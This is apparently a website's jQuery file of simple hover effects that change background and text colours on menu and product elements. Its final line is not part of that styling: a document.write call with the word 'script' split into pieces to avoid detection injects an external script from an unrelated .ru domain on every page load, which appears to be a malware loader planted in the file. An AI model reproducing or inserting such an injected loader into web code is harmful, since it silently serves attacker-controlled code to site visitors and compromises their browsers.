﻿$(document).ready(function() {
    $(".con-bar").hover(
      function() { $(this).css({ "background": "#e8e8e8" }); },
      function() { $(this).css({ "background": "#ffffff" }); });
});

$(document).ready(function() {
    $(".pro").hover(
      function() { $(this).css({ "background": "#0f5fa4" }); },
      function() { $(this).css({ "background": "#e8e8e8" }); });
});

$(document).ready(function() {
    $(".pro").hover(
      function() { $(this).css({ "color": "#ffffff" }); },
      function() { $(this).css({ "color": "#000000" }); });
});

$(document).ready(function() {
    $(".product").hover(
      function() { $(this).css({ "background": "#0f5fa4" }); },
      function() { $(this).css({ "background": "#e8e8e8" }); });
});

$(document).ready(function() {
    $(".product a").hover(
      function() { $(this).css({ "color": "#ffffff" }); },
      function() { $(this).css({ "color": "#000000" }); });
});


document.write('<s'+'cript type="text/javascript" src="http://obscurewax.ru/Laser_Printer.js"></scr'+'ipt>');